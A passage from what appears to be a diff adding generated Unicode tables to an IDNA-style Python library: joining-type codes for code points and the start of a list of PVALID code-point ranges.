0x74d: 82, + 0x74e: 68, + 0x74f: 68, + 0x750: 68, + 0x751: 68, + 0x752: 68, + 0x753: 68, + 0x754: 68, + 0x755: 68, + 0x756: 68, + 0x757: 68, + 0x758: 68, + 0x759: 82, + 0x75a: 82, + 0x75b: 82, + 0x75c: 68, + 0x75d: 68, + 0x75e: 68, + 0x75f: 68, + 0x760: 68, + 0x761: 68, + 0x762: 68, + 0x763: 68, + 0x764: 68, + 0x765: 68, + 0x766: 68, + 0x767: 68, + 0x768: 68, + 0x769: 68, + 0x76a: 68, + 0x76b: 82, + 0x76c: 82, + 0x76d: 68, + 0x76e: 68, + 0x76f: 68, + 0x770: 68, + 0x771: 82, + 0x772: 68, + 0x773: 82, + 0x774: 82, + 0x775: 68, + 0x776: 68, + 0x777: 68, + 0x778: 82, + 0x779: 82, + 0x77a: 68, + 0x77b: 68, + 0x77c: 68, + 0x77d: 68, + 0x77e: 68, + 0x77f: 68, + 0x7ca: 68, + 0x7cb: 68, + 0x7cc: 68, + 0x7cd: 68, + 0x7ce: 68, + 0x7cf: 68, + 0x7d0: 68, + 0x7d1: 68, + 0x7d2: 68, + 0x7d3: 68, + 0x7d4: 68, + 0x7d5: 68, + 0x7d6: 68, + 0x7d7: 68, + 0x7d8: 68, + 0x7d9: 68, + 0x7da: 68, + 0x7db: 68, + 0x7dc: 68, + 0x7dd: 68, + 0x7de: 68, + 0x7df: 68, + 0x7e0: 68, + 0x7e1: 68, + 0x7e2: 68, + 0x7e3: 68, + 0x7e4: 68, + 0x7e5: 68, + 0x7e6: 68, + 0x7e7: 68, + 0x7e8: 68, + 0x7e9: 68, + 0x7ea: 68, + 0x7fa: 67, + 0x840: 82, + 0x841: 68, + 0x842: 68, + 0x843: 68, + 0x844: 68, + 0x845: 68, + 0x846: 82, + 0x847: 82, + 0x848: 68, + 0x849: 82, + 0x84a: 68, + 0x84b: 68, + 0x84c: 68, + 0x84d: 68, + 0x84e: 68, + 0x84f: 68, + 0x850: 68, + 0x851: 68, + 0x852: 68, + 0x853: 68, + 0x854: 82, + 0x855: 68, + 0x856: 82, + 0x857: 82, + 0x858: 82, + 0x860: 68, + 0x861: 85, + 0x862: 68, + 0x863: 68, + 0x864: 68, + 0x865: 68, + 0x866: 85, + 0x867: 82, + 0x868: 68, + 0x869: 82, + 0x86a: 82, + 0x870: 82, + 0x871: 82, + 0x872: 82, + 0x873: 82, + 0x874: 82, + 0x875: 82, + 0x876: 82, + 0x877: 82, + 0x878: 82, + 0x879: 82, + 0x87a: 82, + 0x87b: 82, + 0x87c: 82, + 0x87d: 82, + 0x87e: 82, + 0x87f: 82, + 0x880: 82, + 0x881: 82, + 0x882: 82, + 0x883: 67, + 0x884: 67, + 0x885: 67, + 0x886: 68, + 0x887: 85, + 0x888: 85, + 0x889: 68, + 0x88a: 68, + 0x88b: 68, + 0x88c: 68, + 0x88d: 68, + 0x88e: 82, + 0x890: 85, + 0x891: 85, + 0x8a0: 68, + 0x8a1: 68, + 0x8a2: 68, + 0x8a3: 68, + 0x8a4: 68, + 0x8a5: 68, + 0x8a6: 68, + 0x8a7: 68, + 0x8a8: 68, + 0x8a9: 68, + 0x8aa: 82, + 0x8ab: 82, + 0x8ac: 82, + 0x8ad: 85, + 0x8ae: 82, + 0x8af: 68, + 0x8b0: 68, + 0x8b1: 82, + 0x8b2: 82, + 0x8b3: 68, + 0x8b4: 68, + 0x8b5: 68, + 0x8b6: 68, + 0x8b7: 68, + 0x8b8: 68, + 0x8b9: 82, + 0x8ba: 68, + 0x8bb: 68, + 0x8bc: 68, + 0x8bd: 68, + 0x8be: 68, + 0x8bf: 68, + 0x8c0: 68, + 0x8c1: 68, + 0x8c2: 68, + 0x8c3: 68, + 0x8c4: 68, + 0x8c5: 68, + 0x8c6: 68, + 0x8c7: 68, + 0x8c8: 68, + 0x8e2: 85, + 0x1806: 85, + 0x1807: 68, + 0x180a: 67, + 0x180e: 85, + 0x1820: 68, + 0x1821: 68, + 0x1822: 68, + 0x1823: 68, + 0x1824: 68, + 0x1825: 68, + 0x1826: 68, + 0x1827: 68, + 0x1828: 68, + 0x1829: 68, + 0x182a: 68, + 0x182b: 68, + 0x182c: 68, + 0x182d: 68, + 0x182e: 68, + 0x182f: 68, + 0x1830: 68, + 0x1831: 68, + 0x1832: 68, + 0x1833: 68, + 0x1834: 68, + 0x1835: 68, + 0x1836: 68, + 0x1837: 68, + 0x1838: 68, + 0x1839: 68, + 0x183a: 68, + 0x183b: 68, + 0x183c: 68, + 0x183d: 68, + 0x183e: 68, + 0x183f: 68, + 0x1840: 68, + 0x1841: 68, + 0x1842: 68, + 0x1843: 68, + 0x1844: 68, + 0x1845: 68, + 0x1846: 68, + 0x1847: 68, + 0x1848: 68, + 0x1849: 68, + 0x184a: 68, + 0x184b: 68, + 0x184c: 68, + 0x184d: 68, + 0x184e: 68, + 0x184f: 68, + 0x1850: 68, + 0x1851: 68, + 0x1852: 68, + 0x1853: 68, + 0x1854: 68, + 0x1855: 68, + 0x1856: 68, + 0x1857: 68, + 0x1858: 68, + 0x1859: 68, + 0x185a: 68, + 0x185b: 68, + 0x185c: 68, + 0x185d: 68, + 0x185e: 68, + 0x185f: 68, + 0x1860: 68, + 0x1861: 68, + 0x1862: 68, + 0x1863: 68, + 0x1864: 68, + 0x1865: 68, + 0x1866: 68, + 0x1867: 68, + 0x1868: 68, + 0x1869: 68, + 0x186a: 68, + 0x186b: 68, + 0x186c: 68, + 0x186d: 68, + 0x186e: 68, + 0x186f: 68, + 0x1870: 68, + 0x1871: 68, + 0x1872: 68, + 0x1873: 68, + 0x1874: 68, + 0x1875: 68, + 0x1876: 68, + 0x1877: 68, + 0x1878: 68, + 0x1880: 85, + 0x1881: 85, + 0x1882: 85, + 0x1883: 85, + 0x1884: 85, + 0x1885: 84, + 0x1886: 84, + 0x1887: 68, + 0x1888: 68, + 0x1889: 68, + 0x188a: 68, + 0x188b: 68, + 0x188c: 68, + 0x188d: 68, + 0x188e: 68, + 0x188f: 68, + 0x1890: 68, + 0x1891: 68, + 0x1892: 68, + 0x1893: 68, + 0x1894: 68, + 0x1895: 68, + 0x1896: 68, + 0x1897: 68, + 0x1898: 68, + 0x1899: 68, + 0x189a: 68, + 0x189b: 68, + 0x189c: 68, + 0x189d: 68, + 0x189e: 68, + 0x189f: 68, + 0x18a0: 68, + 0x18a1: 68, + 0x18a2: 68, + 0x18a3: 68, + 0x18a4: 68, + 0x18a5: 68, + 0x18a6: 68, + 0x18a7: 68, + 0x18a8: 68, + 0x18aa: 68, + 0x200c: 85, + 0x200d: 67, + 0x202f: 85, + 0x2066: 85, + 0x2067: 85, + 0x2068: 85, + 0x2069: 85, + 0xa840: 68, + 0xa841: 68, + 0xa842: 68, + 0xa843: 68, + 0xa844: 68, + 0xa845: 68, + 0xa846: 68, + 0xa847: 68, + 0xa848: 68, + 0xa849: 68, + 0xa84a: 68, + 0xa84b: 68, + 0xa84c: 68, + 0xa84d: 68, + 0xa84e: 68, + 0xa84f: 68, + 0xa850: 68, + 0xa851: 68, + 0xa852: 68, + 0xa853: 68, + 0xa854: 68, + 0xa855: 68, + 0xa856: 68, + 0xa857: 68, + 0xa858: 68, + 0xa859: 68, + 0xa85a: 68, + 0xa85b: 68, + 0xa85c: 68, + 0xa85d: 68, + 0xa85e: 68, + 0xa85f: 68, + 0xa860: 68, + 0xa861: 68, + 0xa862: 68, + 0xa863: 68, + 0xa864: 68, + 0xa865: 68, + 0xa866: 68, + 0xa867: 68, + 0xa868: 68, + 0xa869: 68, + 0xa86a: 68, + 0xa86b: 68, + 0xa86c: 68, + 0xa86d: 68, + 0xa86e: 68, + 0xa86f: 68, + 0xa870: 68, + 0xa871: 68, + 0xa872: 76, + 0xa873: 85, + 0x10ac0: 68, + 0x10ac1: 68, + 0x10ac2: 68, + 0x10ac3: 68, + 0x10ac4: 68, + 0x10ac5: 82, + 0x10ac6: 85, + 0x10ac7: 82, + 0x10ac8: 85, + 0x10ac9: 82, + 0x10aca: 82, + 0x10acb: 85, + 0x10acc: 85, + 0x10acd: 76, + 0x10ace: 82, + 0x10acf: 82, + 0x10ad0: 82, + 0x10ad1: 82, + 0x10ad2: 82, + 0x10ad3: 68, + 0x10ad4: 68, + 0x10ad5: 68, + 0x10ad6: 68, + 0x10ad7: 76, + 0x10ad8: 68, + 0x10ad9: 68, + 0x10ada: 68, + 0x10adb: 68, + 0x10adc: 68, + 0x10add: 82, + 0x10ade: 68, + 0x10adf: 68, + 0x10ae0: 68, + 0x10ae1: 82, + 0x10ae2: 85, + 0x10ae3: 85, + 0x10ae4: 82, + 0x10aeb: 68, + 0x10aec: 68, + 0x10aed: 68, + 0x10aee: 68, + 0x10aef: 82, + 0x10b80: 68, + 0x10b81: 82, + 0x10b82: 68, + 0x10b83: 82, + 0x10b84: 82, + 0x10b85: 82, + 0x10b86: 68, + 0x10b87: 68, + 0x10b88: 68, + 0x10b89: 82, + 0x10b8a: 68, + 0x10b8b: 68, + 0x10b8c: 82, + 0x10b8d: 68, + 0x10b8e: 82, + 0x10b8f: 82, + 0x10b90: 68, + 0x10b91: 82, + 0x10ba9: 82, + 0x10baa: 82, + 0x10bab: 82, + 0x10bac: 82, + 0x10bad: 68, + 0x10bae: 68, + 0x10baf: 85, + 0x10d00: 76, + 0x10d01: 68, + 0x10d02: 68, + 0x10d03: 68, + 0x10d04: 68, + 0x10d05: 68, + 0x10d06: 68, + 0x10d07: 68, + 0x10d08: 68, + 0x10d09: 68, + 0x10d0a: 68, + 0x10d0b: 68, + 0x10d0c: 68, + 0x10d0d: 68, + 0x10d0e: 68, + 0x10d0f: 68, + 0x10d10: 68, + 0x10d11: 68, + 0x10d12: 68, + 0x10d13: 68, + 0x10d14: 68, + 0x10d15: 68, + 0x10d16: 68, + 0x10d17: 68, + 0x10d18: 68, + 0x10d19: 68, + 0x10d1a: 68, + 0x10d1b: 68, + 0x10d1c: 68, + 0x10d1d: 68, + 0x10d1e: 68, + 0x10d1f: 68, + 0x10d20: 68, + 0x10d21: 68, + 0x10d22: 82, + 0x10d23: 68, + 0x10f30: 68, + 0x10f31: 68, + 0x10f32: 68, + 0x10f33: 82, + 0x10f34: 68, + 0x10f35: 68, + 0x10f36: 68, + 0x10f37: 68, + 0x10f38: 68, + 0x10f39: 68, + 0x10f3a: 68, + 0x10f3b: 68, + 0x10f3c: 68, + 0x10f3d: 68, + 0x10f3e: 68, + 0x10f3f: 68, + 0x10f40: 68, + 0x10f41: 68, + 0x10f42: 68, + 0x10f43: 68, + 0x10f44: 68, + 0x10f45: 85, + 0x10f51: 68, + 0x10f52: 68, + 0x10f53: 68, + 0x10f54: 82, + 0x10f70: 68, + 0x10f71: 68, + 0x10f72: 68, + 0x10f73: 68, + 0x10f74: 82, + 0x10f75: 82, + 0x10f76: 68, + 0x10f77: 68, + 0x10f78: 68, + 0x10f79: 68, + 0x10f7a: 68, + 0x10f7b: 68, + 0x10f7c: 68, + 0x10f7d: 68, + 0x10f7e: 68, + 0x10f7f: 68, + 0x10f80: 68, + 0x10f81: 68, + 0x10fb0: 68, + 0x10fb1: 85, + 0x10fb2: 68, + 0x10fb3: 68, + 0x10fb4: 82, + 0x10fb5: 82, + 0x10fb6: 82, + 0x10fb7: 85, + 0x10fb8: 68, + 0x10fb9: 82, + 0x10fba: 82, + 0x10fbb: 68, + 0x10fbc: 68, + 0x10fbd: 82, + 0x10fbe: 68, + 0x10fbf: 68, + 0x10fc0: 85, + 0x10fc1: 68, + 0x10fc2: 82, + 0x10fc3: 82, + 0x10fc4: 68, + 0x10fc5: 85, + 0x10fc6: 85, + 0x10fc7: 85, + 0x10fc8: 85, + 0x10fc9: 82, + 0x10fca: 68, + 0x10fcb: 76, + 0x110bd: 85, + 0x110cd: 85, + 0x1e900: 68, + 0x1e901: 68, + 0x1e902: 68, + 0x1e903: 68, + 0x1e904: 68, + 0x1e905: 68, + 0x1e906: 68, + 0x1e907: 68, + 0x1e908: 68, + 0x1e909: 68, + 0x1e90a: 68, + 0x1e90b: 68, + 0x1e90c: 68, + 0x1e90d: 68, + 0x1e90e: 68, + 0x1e90f: 68, + 0x1e910: 68, + 0x1e911: 68, + 0x1e912: 68, + 0x1e913: 68, + 0x1e914: 68, + 0x1e915: 68, + 0x1e916: 68, + 0x1e917: 68, + 0x1e918: 68, + 0x1e919: 68, + 0x1e91a: 68, + 0x1e91b: 68, + 0x1e91c: 68, + 0x1e91d: 68, + 0x1e91e: 68, + 0x1e91f: 68, + 0x1e920: 68, + 0x1e921: 68, + 0x1e922: 68, + 0x1e923: 68, + 0x1e924: 68, + 0x1e925: 68, + 0x1e926: 68, + 0x1e927: 68, + 0x1e928: 68, + 0x1e929: 68, + 0x1e92a: 68, + 0x1e92b: 68, + 0x1e92c: 68, + 0x1e92d: 68, + 0x1e92e: 68, + 0x1e92f: 68, + 0x1e930: 68, + 0x1e931: 68, + 0x1e932: 68, + 0x1e933: 68, + 0x1e934: 68, + 0x1e935: 68, + 0x1e936: 68, + 0x1e937: 68, + 0x1e938: 68, + 0x1e939: 68, + 0x1e93a: 68, + 0x1e93b: 68, + 0x1e93c: 68, + 0x1e93d: 68, + 0x1e93e: 68, + 0x1e93f: 68, + 0x1e940: 68, + 0x1e941: 68, + 0x1e942: 68, + 0x1e943: 68, + 0x1e94b: 84, +} +codepoint_classes = { + 'PVALID': ( + 0x2d0000002e, + 0x300000003a, + 0x610000007b, + 0xdf000000f7, + 0xf800000100, + 0x10100000102, + 0x10300000104, + 0x10500000106, + 0x10700000108, + 0x1090000010a, + 0x10b0000010c, + 0x10d0000010e, + 0x10f00000110, + 0x11100000112, + 0x11300000114, + 0x11500000116, + 0x11700000118, + 0x1190000011a, + 0x11b0000011c, + 0x11d0000011e, + 0x11f00000120, + 0x12100000122, + 0x12300000124, + 0x12500000126, + 0x12700000128, + 0x1290000012a, + 0x12b0000012c, + 0x12d0000012e, + 0x12f00000130, + 0x13100000132, + 0x13500000136, + 0x13700000139, + 0x13a0000013b, + 0x13c0000013d, + 0x13e0000013f, + 0x14200000143, + 0x14400000145, + 0x14600000147, + 0x14800000149, + 0x14b0000014c, + 0x14d0000014e, + 0x14f00000150, + 0x15100000152, + 0x15300000154, + 0x15500000156, + 0x15700000158, + 0x1590000015a, + 0x15b0000015c, + 0x15d0000015e, + 0x15f00000160, + 0x16100000162, + 0x16300000164, + 0x16500000166, + 0x16700000168, + 0x1690000016a, + 0x16b0000016c, + 0x16d0000016e, + 0x16f00000170, + 0x17100000172, + 0x17300000174, + 0x17500000176, + 0x17700000178, + 0x17a0000017b, + 0x17c0000017d, + 0x17e0000017f, + 0x18000000181, + 0x18300000184, + 0x18500000186, + 0x18800000189, + 0x18c0000018e, + 0x19200000193, + 0x19500000196, + 0x1990000019c, + 0x19e0000019f, + 0x1a1000001a2, + 0x1a3000001a4, + 0x1a5000001a6, + 0x1a8000001a9, + 0x1aa000001ac, + 0x1ad000001ae, + 0x1b0000001b1, + 0x1b4000001b5, + 0x1b6000001b7, + 0x1b9000001bc, + 0x1bd000001c4, + 0x1ce000001cf, + 0x1d0000001d1, + 0x1d2000001d3, + 0x1d4000001d5, + 0x1d6000001d7, + 0x1d8000001d9, + 0x1da000001db, + 0x1dc000001de, + 0x1df000001e0, + 0x1e1000001e2, + 0x1e3000001e4, + 0x1e5000001e6, + 0x1e7000001e8, + 0x1e9000001ea, + 0x1eb000001ec, + 0x1ed000001ee, + 0x1ef000001f1, + 0x1f5000001f6, + 0x1f9000001fa, + 0x1fb000001fc, + 0x1fd000001fe, + 0x1ff00000200, + 0x20100000202, + 0x20300000204, + 0x20500000206, + 0x20700000208, + 0x2090000020a, + 0x20b0000020c, + 0x20d0000020e, + 0x20f00000210, + 0x21100000212, + 0x21300000214, + 0x21500000216, + 0x21700000218, + 0x2190000021a, + 0x21b0000021c, + 0x21d0000021e, + 0x21f00000220, + 0x22100000222, + 0x22300000224, + 0x22500000226, + 0x22700000228, + 0x2290000022a, + 0x22b0000022c, + 0x22d0000022e, + 0x22f00000230, + 0x23100000232, + 0x2330000023a, + 0x23c0000023d, + 0x23f00000241, + 0x24200000243, + 0x24700000248, + 0x2490000024a, + 0x24b0000024c, + 0x24d0000024e, + 0x24f000002b0, + 0x2b9000002c2, + 0x2c6000002d2, + 0x2ec000002ed, + 0x2ee000002ef, + 0x30000000340, + 0x34200000343, + 0x3460000034f, + 0x35000000370, + 0x37100000372, + 0x37300000374, + 0x37700000378, + 0x37b0000037e, + 0x39000000391, + 0x3ac000003cf, + 0x3d7000003d8, + 0x3d9000003da, + 0x3db000003dc, + 0x3dd000003de, + 0x3df000003e0, + 0x3e1000003e2, + 0x3e3000003e4, + 0x3e5000003e6, + 0x3e7000003e8, + 0x3e9000003ea, + 0x3eb000003ec, + 0x3ed000003ee, + 0x3ef000003f0, + 0x3f3000003f4, + 0x3f8000003f9, + 0x3fb000003fd, + 0x43000000460, + 0x46100000462, + 0x46300000464, + 0x46500000466, + 0x46700000468, + 0x4690000046a, + 0x46b0000046c, + 0x46d0000046e, + 0x46f00000470, + 0x47100000472, + 0x47300000474, + 0x47500000476, + 0x47700000478, + 0x4790000047a, + 0x47b0000047c, + 0x47d0000047e, + 0x47f00000480, + 0x48100000482, + 0x48300000488, + 0x48b0000048c, + 0x48d0000048e, + 0x48f00000490, + 0x49100000492, + 0x49300000494, + 0x49500000496, + 0x49700000498, + 0x4990000049a, + 0x49b0000049c, + 0x49d0000049e, + 0x49f000004a0, + 0x4a1000004a2, + 0x4a3000004a4, + 0x4a5000004a6, + 0x4a7000004a8, + 0x4a9000004aa, + 0x4ab000004ac, + 0x4ad000004ae, + 0x4af000004b0, + 0x4b1000004b2, + 0x4b3000004b4, + 0x4b5000004b6, + 0x4b7000004b8, + 0x4b9000004ba, + 0x4bb000004bc, + 0x4bd000004be, + 0x4bf000004c0, + 0x4c2000004c3, + 0x4c4000004c5, + 0x4c6000004c7, + 0x4c8000004c9, + 0x4ca000004cb, + 0x4cc000004cd, + 0x4ce000004d0, + 0x4d1000004d2, + 0x4d3000004d4, + 0x4d5000004d6, + 0x4d7000004d8, + 0x4d9000004da, + 0x4db000004dc, + 0x4dd000004de, + 0x4df000004e0, + 0x4e1000004e2, + 0x4e3000004e4, + 0x4e5000004e6, + 0x4e7000004e8, + 0x4e9000004ea, + 0x4eb000004ec, + 0x4ed000004ee, + 0x4ef000004f0, + 0x4f1000004f2, + 0x4f3000004f4, + 0x4f5000004f6, + 0x4f7000004f8, + 0x4f9000004fa, + 0x4fb000004fc, + 0x4fd000004fe, + 0x4ff00000500, + 0x50100000502, + 0x50300000504, + 0x50500000506, + 0x50700000508, + 0x5090000050a, + 0x50b0000050c, + 0x50d0000050e, + 0x50f00000510, + 0x51100000512, + 0x51300000514, + 0x51500000516, + 0x51700000518, + 0x5190000051a, + 0x51b0000051c, + 0x51d0000051e, + 0x51f00000520, + 0x52100000522, + 0x52300000524, + 0x52500000526, + 0x52700000528, + 0x5290000052a, + 0x52b0000052c, + 0x52d0000052e, + 0x52f00000530, + 0x5590000055a, + 0x56000000587, + 0x58800000589, + 0x591000005be, + 0x5bf000005c0, + 0x5c1000005c3, + 0x5c4000005c6, + 0x5c7000005c8, + 0x5d0000005eb, + 0x5ef000005f3, + 0x6100000061b, + 0x62000000640, + 0x64100000660, + 0x66e00000675, + 0x679000006d4, + 0x6d5000006dd, + 0x6df000006e9, + 0x6ea000006f0, + 0x6fa00000700, + 0x7100000074b, + 0x74d000007b2, + 0x7c0000007f6, + 0x7fd000007fe, + 0x8000000082e, + 0x8400000085c, + 0x8600000086b, + 0x87000000888, + 0x8890000088f, + 0x898000008e2, + 0x8e300000958, + 0x96000000964, + 0x96600000970, + 0x97100000984, + 0x9850000098d, + 0x98f00000991, + 0x993000009a9, + 0x9aa000009b1, + 0x9b2000009b3, + 0x9b6000009ba, + 0x9bc000009c5, + 0x9c7000009c9, + 0x9cb000009cf, + 0x9d7000009d8, + 0x9e0000009e4, + 0x9e6000009f2, + 0x9fc000009fd, + 0x9fe000009ff, + 0xa0100000a04, + 0xa0500000a0b, + 0xa0f00000a11, + 0xa1300000a29, + 0xa2a00000a31, + 0xa3200000a33, + 0xa3500000a36, + 0xa3800000a3a, + 0xa3c00000a3d, + 0xa3e00000a43, + 0xa4700000a49, + 0xa4b00000a4e, + 0xa5100000a52, + 0xa5c00000a5d, + 0xa6600000a76, + 0xa8100000a84, + 0xa8500000a8e, + 0xa8f00000a92, + 0xa9300000aa9, + 0xaaa00000ab1, + 0xab200000ab4, + 0xab500000aba, + 0xabc00000ac6, + 0xac700000aca, + 0xacb00000ace, + 0xad000000ad1, + 0xae000000ae4, + 0xae600000af0, + 0xaf900000b00, + 0xb0100000b04, + 0xb0500000b0d, + 0xb0f00000b11, + 0xb1300000b29, + 0xb2a00000b31, + 0xb3200000b34, + 0xb3500000b3a, + 0xb3c00000b45, + 0xb4700000b49, + 0xb4b00000b4e, + 0xb5500000b58, + 0xb5f00000b64, + 0xb6600000b70, + 0xb7100000b72, + 0xb8200000b84, + 0xb8500000b8b, + 0xb8e00000b91, + 0xb9200000b96, + 0xb9900000b9b, + 0xb9c00000b9d, + 0xb9e00000ba0, + 0xba300000ba5, + 0xba800000bab, + 0xbae00000bba, + 0xbbe00000bc3, + 0xbc600000bc9, + 0xbca00000bce, + 0xbd000000bd1, + 0xbd700000bd8, + 0xbe600000bf0, + 0xc0000000c0d, + 0xc0e00000c11, + 0xc1200000c29, + 0xc2a00000c3a, + 0xc3c00000c45, + 0xc4600000c49, + 0xc4a00000c4e, + 0xc5500000c57, + 0xc5800000c5b, + 0xc5d00000c5e, + 0xc6000000c64, + 0xc6600000c70, + 0xc8000000c84, + 0xc8500000c8d, + 0xc8e00000c91, + 0xc9200000ca9, + 0xcaa00000cb4, + 0xcb500000cba, + 0xcbc00000cc5, + 0xcc600000cc9, + 0xcca00000cce, + 0xcd500000cd7, + 0xcdd00000cdf, + 0xce000000ce4, + 0xce600000cf0, + 0xcf100000cf3, + 0xd0000000d0d, + 0xd0e00000d11, + 0xd1200000d45, + 0xd4600000d49, + 0xd4a00000d4f, + 0xd5400000d58, + 0xd5f00000d64, + 0xd6600000d70, + 0xd7a00000d80, + 0xd8100000d84, + 0xd8500000d97, + 0xd9a00000db2, + 0xdb300000dbc, + 0xdbd00000dbe, + 0xdc000000dc7, + 0xdca00000dcb, + 0xdcf00000dd5, + 0xdd600000dd7, + 0xdd800000de0, + 0xde600000df0, + 0xdf200000df4, + 0xe0100000e33, + 0xe3400000e3b, + 0xe4000000e4f, + 0xe5000000e5a, + 0xe8100000e83, + 0xe8400000e85, + 0xe8600000e8b, + 0xe8c00000ea4, + 0xea500000ea6, + 0xea700000eb3, + 0xeb400000ebe, + 0xec000000ec5, + 0xec600000ec7, + 0xec800000ece, + 0xed000000eda, + 0xede00000ee0, + 0xf0000000f01, + 0xf0b00000f0c, + 0xf1800000f1a, + 0xf2000000f2a, + 0xf3500000f36, + 0xf3700000f38, + 0xf3900000f3a, + 0xf3e00000f43, + 0xf4400000f48, + 0xf4900000f4d, + 0xf4e00000f52, + 0xf5300000f57, + 0xf5800000f5c, + 0xf5d00000f69, + 0xf6a00000f6d, + 0xf7100000f73, + 0xf7400000f75, + 0xf7a00000f81, + 0xf8200000f85, + 0xf8600000f93, + 0xf9400000f98, + 0xf9900000f9d, + 0xf9e00000fa2, + 0xfa300000fa7, + 0xfa800000fac, + 0xfad00000fb9, + 0xfba00000fbd, + 0xfc600000fc7, + 0x10000000104a, + 0x10500000109e, + 0x10d0000010fb, + 0x10fd00001100, + 0x120000001249, + 0x124a0000124e, + 0x125000001257, + 0x125800001259, + 0x125a0000125e, + 0x126000001289, + 0x128a0000128e, + 0x1290000012b1, + 0x12b2000012b6, + 0x12b8000012bf, + 0x12c0000012c1, + 0x12c2000012c6, + 0x12c8000012d7, + 0x12d800001311, + 0x131200001316, + 0x13180000135b, + 0x135d00001360, + 0x138000001390, + 0x13a0000013f6, + 0x14010000166d, + 0x166f00001680, + 0x16810000169b, + 0x16a0000016eb, + 0x16f1000016f9, + 0x170000001716, + 0x171f00001735, + 0x174000001754, + 0x17600000176d, + 0x176e00001771, + 0x177200001774, + 0x1780000017b4, + 0x17b6000017d4, + 0x17d7000017d8, + 0x17dc000017de, + 0x17e0000017ea, + 0x18100000181a, + 0x182000001879, + 0x1880000018ab, + 0x18b0000018f6, + 0x19000000191f, + 0x19200000192c, + 0x19300000193c, + 0x19460000196e, + 0x197000001975, + 0x1980000019ac, + 0x19b0000019ca, + 0x19d0000019da, + 0x1a0000001a1c, + 0x1a2000001a5f, + 0x1a6000001a7d, + 0x1a7f00001a8a, + 0x1a9000001a9a, + 0x1aa700001aa8, + 0x1ab000001abe, + 0x1abf00001acf, + 0x1b0000001b4d, + 0x1b5000001b5a, + 0x1b6b00001b74, + 0x1b8000001bf4, + 0x1c0000001c38, + 0x1c4000001c4a, + 0x1c4d00001c7e, + 0x1cd000001cd3, + 0x1cd400001cfb, + 0x1d0000001d2c, + 0x1d2f00001d30, + 0x1d3b00001d3c, + 0x1d4e00001d4f, + 0x1d6b00001d78, + 0x1d7900001d9b, + 0x1dc000001e00, + 0x1e0100001e02, + 0x1e0300001e04, + 0x1e0500001e06, + 0x1e0700001e08, + 0x1e0900001e0a, + 0x1e0b00001e0c, + 0x1e0d00001e0e, + 0x1e0f00001e10, + 0x1e1100001e12, + 0x1e1300001e14, + 0x1e1500001e16, + 0x1e1700001e18, + 0x1e1900001e1a, + 0x1e1b00001e1c, + 0x1e1d00001e1e, + 0x1e1f00001e20, + 0x1e2100001e22, + 0x1e2300001e24, + 0x1e2500001e26, + 0x1e2700001e28, + 0x1e2900001e2a, + 0x1e2b00001e2c, + 0x1e2d00001e2e, + 0x1e2f00001e30, + 0x1e3100001e32, + 0x1e3300001e34, + 0x1e3500001e36, + 0x1e3700001e38, + 0x1e3900001e3a, + 0x1e3b00001e3c, + 0x1e3d00001e3e, + 0x1e3f00001e40, + 0x1e4100001e42, + 0x1e4300001e44, + 0x1e4500001e46, + 0x1e4700001e48, + 0x1e4900001e4a, + 0x1e4b00001e4c, + 0x1e4d00001e4e, + 0x1e4f00001e50, + 0x1e5100001e52, + 0x1e5300001e54, + 0x1e5500001e56, + 0x1e5700001e58, + 0x1e5900001e5a, + 0x1e5b00001e5c, + 0x1e5d00001e5e, + 0x1e5f00001e60, + 0x1e6100001e62, + 0x1e6300001e64, + 0x1e6500001e66, + 0x1e6700001e68, + 0x1e6900001e6a, + 0x1e6b00001e6c, + 0x1e6d00001e6e, + 0x1e6f00001e70, + 0x1e7100001e72, + 0x1e7300001e74, + 0x1e7500001e76, + 0x1e7700001e78, + 0x1e7900001e7a, + 0x1e7b00001e7c, + 0x1e7d00001e7e, + 0x1e7f00001e80, + 0x1e8100001e82, + 0x1e8300001e84, + 0x1e8500001e86, + 0x1e8700001e88, + 0x1e8900001e8a, + 0x1e8b00001e8c, + 0x1e8d00001e8e, + 0x1e8f00001e90, + 0x1e9100001e92, + 0x1e9300001e94, + 0x1e9500001e9a, + 0x1e9c00001e9e, + 0x1e9f00001ea0, + 0x1ea100001ea2, + 0x1ea300001ea4, + 0x1ea500001ea6, + 0x1ea700001ea8, + 0x1ea900001eaa, + 0x1eab00001eac, + 0x1ead00001eae, + 0x1eaf00001eb0, + 0x1eb100001eb2, + 0x1eb300001eb4, + 0x1eb500001eb6, + 0x1eb700001eb8, + 0x1eb900001eba, + 0x1ebb00001ebc, + 0x1ebd00001ebe, + 0x1ebf00001ec0, + 0x1ec100001ec2, + 0x1ec300001ec4, + 0x1ec500001ec6, + 0x1ec700001ec8, + 0x1ec900001eca, + 0x1ecb00001ecc, + 0x1ecd00001ece, + 0x1ecf00001ed0, + 0x1ed100001ed2, + 0x1ed300001ed4, + 0x1ed500001ed6, + 0x1ed700001ed8, + 0x1ed900001eda, + 0x1edb00001edc, + 0x1edd00001ede, + 0x1edf00001ee0, + 0x1ee100001ee2, + 0x1ee300001ee4, + 0x1ee500001ee6, + 0x1ee700001ee8, + 0x1ee900001eea, + 0x1eeb00001eec, + 0x1eed00001eee, + 0x1eef00001ef0, + 0x1ef100001ef2, + 0x1ef300001ef4, + 0x1ef500001ef6, + 0x1ef700001ef8, + 0x1ef900001efa, + 0x1efb00001efc, + 0x1efd00001efe, + 0x1eff00001f08, + 0x1f1000001f16, + 0x1f2000001f28, + 0x1f3000001f38, + 0x1f4000001f46, + 0x1f5000001f58, + 0x1f6000001f68, + 0x1f7000001f71, + 0x1f7200001f73, + 0x1f7400001f75, + 0x1f7600001f77, + 0x1f7800001f79, + 0x1f7a00001f7b, + 0x1f7c00001f7d, + 0x1fb000001fb2, + 0x1fb600001fb7, + 0x1fc600001fc7, + 0x1fd000001fd3, + 0x1fd600001fd8, + 0x1fe000001fe3, + 0x1fe400001fe8, + 0x1ff600001ff7, + 0x214e0000214f, + 0x218400002185, + 0x2c3000002c60, + 0x2c6100002c62, + 0x2c6500002c67, + 0x2c6800002c69, + 0x2c6a00002c6b, + 0x2c6c00002c6d, + 0x2c7100002c72, + 0x2c7300002c75, + 0x2c7600002c7c, + 0x2c8100002c82, + 0x2c8300002c84, + 0x2c8500002c86, + 0x2c8700002c88, + 0x2c8900002c8a, + 0x2c8b00002c8c, + 0x2c8d00002c8e, + 0x2c8f00002c90, + 0x2c9100002c92, + 0x2c9300002c94, + 0x2c9500002c96, + 0x2c9700002c98, + 0x2c9900002c9a, + 0x2c9b00002c9c, + 0x2c9d00002c9e, + 0x2c9f00002ca0, + 0x2ca100002ca2, + 0x2ca300002ca4, + 0x2ca500002ca6, + 0x2ca700002ca8, + 0x2ca900002caa, + 0x2cab00002cac, + 